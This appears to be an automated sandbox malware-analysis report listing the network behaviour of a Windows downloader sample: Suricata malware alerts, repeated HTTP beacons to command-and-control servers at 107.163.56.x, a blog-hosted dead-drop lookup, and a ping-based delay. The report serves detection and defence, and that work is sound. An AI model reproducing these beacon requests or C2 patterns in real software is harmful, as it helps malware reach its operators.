Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 18963
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficTCP traffic: 192.168.2.11:49705 -> 107.163.56.231:18530
Source: global trafficTCP traffic: 192.168.2.11:49706 -> 107.163.56.110:18530
Source: global trafficTCP traffic: 192.168.2.11:49718 -> 107.163.56.251:6658
Source: global trafficTCP traffic: 192.168.2.11:49722 -> 107.163.56.232:18963
Source: Joe Sandbox ViewIP Address: 107.163.56.110 107.163.56.110
Source: Joe Sandbox ViewIP Address: 107.163.56.251 107.163.56.251
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49726 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49729 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49706 -> 107.163.56.110:18530
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49736 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49738 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49742 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49755 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49728 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49740 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49763 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49723 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49741 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49752 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49759 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49746 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49760 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49780 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49772 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49747 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49764 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49751 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49754 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49776 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49771 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49777 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49758 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49722 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49765 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49773 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49779 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49762 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49810 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49815 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49705 -> 107.163.56.231:18530
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49796 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49766 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49832 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49804 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49784 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49823 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49845 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49795 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49788 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49847 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49794 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49825 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49859 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49840 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49801 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49809 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49814 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49852 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49849 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49803 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49748 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49822 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49797 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49783 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49734 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49730 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49819 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49844 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49767 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49813 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49775 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49860 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49856 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49841 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49737 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49750 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49855 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49793 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49805 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49848 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49799 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49820 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49739 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49787 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49835 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49798 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49756 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49850 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49851 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49802 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49821 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49806 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49800 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49827 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49733 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49839 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49808 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49781 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49785 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49789 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49792 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49828 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49837 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49830 -> 116.133.8.92:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49836 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49843 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49818 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49831 -> 107.163.56.232:18963
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49854 -> 107.163.56.232:18963
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC@ HTTP/1.1User-Agent: Mozilla/4.0 (compatible)Host: 107.163.56.231:18530Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u1129.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.110:18530Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
